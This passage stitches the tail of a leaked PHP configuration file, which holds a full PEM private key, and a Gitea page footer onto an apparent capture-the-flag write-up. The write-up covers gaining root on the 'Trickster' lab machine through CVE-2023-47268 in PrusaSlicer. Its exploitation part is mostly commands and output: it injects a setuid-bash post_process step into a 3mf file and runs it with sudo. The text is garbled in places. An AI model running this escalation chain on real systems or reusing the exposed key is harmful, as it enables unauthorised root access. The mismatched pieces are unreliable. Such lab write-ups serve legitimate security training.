MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2meozijOIJFPFPkpoFKPdVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
' ,
'api_private_key' => '-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC5IVA/fGtlxwpt
L9UYoyu/x0XggmH0X02+Y9mqIU2kmcEeF9YTdhUz86sREQYrO2QcWxAZRlcUjCIF
BWzmQAbmN/D6FCuXz34lEPSiBn44dR838KCYzZ6rUf+DEBh9xF/CNKU6HZjMDCku
/C1hcG1Jy7pCpEB2i2iSpbabdoy34tXwRF0WwGSP785V0nyiyW9K3oqB/f0OcGkY
hcCpoVxB0x2r7WVP2iJvLR7HJSSXpolTbVJMVnuQJ/RJ5ynZ/02hoqgHAL2bvTsL
ZQI2QCYHYDbDF/zwEMLsK3BrPANb1Bd0X3ztFTMaP1SsRbBPBgRwlxX+E0Hjvdtz
K1om9jVlAgMBAAECggEAD5CTdKL7TJVNdRyeZ/HgDcGtSFDt92PD34v5kuo14u7i
Y6tRXlWBNtr3uPmbcSsPIasuUVGupJWbjpyEKV+ctOJjKkNj3uGdE3S3fJ/bINgI
BeX/OpmfC3xbZSOHS5ulCWjvs1EltZIYLFEbZ6PSLHAqesvgd5cE9b9k+PEgp50Q
DivaH4PxfI7IKLlcWiq2mBrYwsWHIlcaN0Ys7h0RYn7OjhrPr8V/LyJLIlapBeQV
Geq6MswRO6OXfLs4Rzuw1dedDPdDZFdSaef6I2tm4Puq4kB5CzqQ8WfsMiz6zFU/
UIHnnv9jrqfHGYoq9g5rQWKyjxMTlKA8PnMiKzssiQKBgQDeamSzzG6fdtSlK8zC
TXHpssVQjbw9aIQYX6YaiApvsi8a6V5E8IesHqDnS+s+9vjrHew4rZ6Uy0uV9p2P
MAi3gd1Gl9mBQd36Dp53AWik29cxKPdvj92ZBiygtRgTyxWHQ7E6WwxeNUWwMR/i
4XoaSFyWK7v5Aoa59ECduzJm1wKBgQDVFaDVFgBS36r4fvmw4JUYAEo/u6do3Xq9
JQRALrEO9mdIsBjYs9N8gte/9FAijxCIprDzFFhgUxYFSoUexyRkt7fAsFpuSRgs
+Ksu4bKxkIQaa5pn2WNh1rdHq06KryC0iLbNii6eiHMyIDYKX9KpByaGDtmfrsRs
uxD9umhKIwKBgECAXl/+Q36feZ/FCga3ave5TpvD3vl4HAbthkBff5dQ93Q4hYw8
rTvvTf6F9900xo95CA6P21OPeYYuFRd3eK+vS7qzQvLHZValcrNUh0J4NvocxVVn
RX6hWcPpgOgMl1u49+bSjM2taV5lgLfNaBnDLoamfEcEwomfGjYkGcPVAoGBAILy
1rL84VgMslIiHipP6fAlBXwjQ19TdMFWRUV4LEFotdJavfo2kMpc0l/ZsYF7cAq6
fdX0c9dGWCsKP8LJWRk4OgmFlx1deCjy7KhT9W/fwv9Fj08wrj2LKXk20n6x3yRz
O/wWZk3wxvJQD0XS23Aav9b0u1LBoV68m1WCP+MHAoGBANwjGWnrY6TexCRzKdOQ
K/cEIFYczJn7IB/zbB1SEC19vRT5ps89Z25BOu/hCVRhVg9bb5QslLSGNPlmuEpo
HfSWR+q1UdaEfABY59ZsFSuhbqvC5gvRZVQ55bPLuja5mc/VvPIGT/BGY7lAdEbK
6SMIa53I2hJz4IMK4vc2Ssqq
-----END PRIVATE KEY-----
' ,
),
);
Reference in New Issue View Git Blame Copy Permalink
Powered by Gitea Version: 1.22.1 Page: 158ms Template: 14ms
English
Bahasa Indonesia Deutsch English Español Français Italiano Latviešu Magyar nyelv Nederlands Polski Português de Portugal Português do Brasil Suomi Svenska Türkçe Čeština Ελληνικά Български Русский Українська فارسی മലയാളം 日本語 简体中文 繁體中文(台灣) 繁體中文(香港) 한국어
Licenses API%
Use the credentials to ssh
into the system as adam.
ssh adam@10.10.11.34
adam@10.10.11ric.34's password:
adam@trickster:~$
Privilege Escalation
Pillaging - adam [ user ]
The user is allowed to run prusaslicer
as a sudo
without any password.
adam@trickster:~$ sudo -l
Matching Defaults entries for adam on trickster:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User adam may run the following commands on trickster:
(ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer
adam@trickster:~$
The /opt/PrusaSlicer contains the two files, one is prusaslicer
binary and another is TRICKSTER.3mf
adam@trickster:~$ cd /opt/PrusaSlicer
adam@trickster:/opt/PrusaSlicer$ ls
prusaslicer TRICKSTER.3mf
adam@trickster:/opt/PrusaSlicer$
PrusaSlicer is a popular 3D slicing software designed for FFF (Fused Filament Fabrication) and mSLA (mask Stereolithography) 3D printers. The prusaslicer
is vulnerable to CVE-2023–47268 arbitrary code execution through 3mf files. The exploitdb has a PoC for this vulnerability.
Shell - root [ CVE-2023-47268 Exploit ]
Move the TRICKSTER.3mf file into your local system because the file belongs to root and we cannot edit it.
adam@trickster:/opt/PrusaSlicer$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
wget http://10.10.11.34:8000/TRICKSTER.3mf
--2025-02-03 01:35:54-- http://10.10.11.34:8000/TRICKSTER.3mf
Connecting to 10.10.11.34:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 138526 (135K) [application/vnd.ms-3mfdocument]
Saving to: ‘TRICKSTER.3mf’
TRICKSTER.3mf 100%[========================================================================================>] 135.28K 37.6KB/s in 3.6s
2025-02-03 01:35:59 (37.6 KB/s) - ‘TRICKSTER.3mf’ saved [138526/138526]
Extract the file Metadata/Slic3r_PE.config
unzip -l TRICKSTER.3mf
Archive: TRICKSTER.3mf
Length Date Time Name
--------- ---------- ----- ----
375 2024-05-23 23:08 [Content_Types].xml
38098 2024-05-23 23:08 Metadata/thumbnail.png
411 2024-05-23 23:08 _rels/.rels
549577 2024-05-23 23:08 3D/3dmodel.model
13624 2024-05-23 23:08 Metadata/Slic3r_PE.config
3414 2024-05-23 23:08 Metadata/Slic3r_PE_model.config
--------- -------
605499 6 files
unzip TRICKSTER.3mf Metadata/Slic3r_PE.config
Archive: TRICKSTER.3mf
inflating: Metadata/Slic3r_PE.config
Modify the extracted file for getting shell as root and compress it.
sed -i "s#; post_process =.*#; post_process = /usr/bin/chmod u+s /bin/bash#" Metadata/Slic3r_PE.config
zip -u TRICKSTER.3mf Metadata/Slic3r_PE.config
updating: Metadata/Slic3r_PE.config
zip warning: Local Entry CRC does not match CD: Metadata/Slic3r_PE.config
(deflated 69%)
Upload the modified TRICKSTER.3mf and execute it with outfile name otherwise it will give the error.
scp TRICKSTER.3mf adam@10.10.11.34:/home/adam
adam@10.10.11.34's password:
TRICKSTER.3mf 100% 135KB 24.1KB/s 00:05
sudo /opt/PrusaSlicer/prusaslicer -s TRICKSTER.3mf -o test
10 => Processing triangulated mesh
10 => Processing triangulated mesh
20 => Generating perimeters
----- SNIP -----
88 => Estimating curled extrusions
88 => Generating skirt and brim
90 => Exporting G-code to test
Proof of Concept
The below video provides the PoC of Trickster machine.
Last updated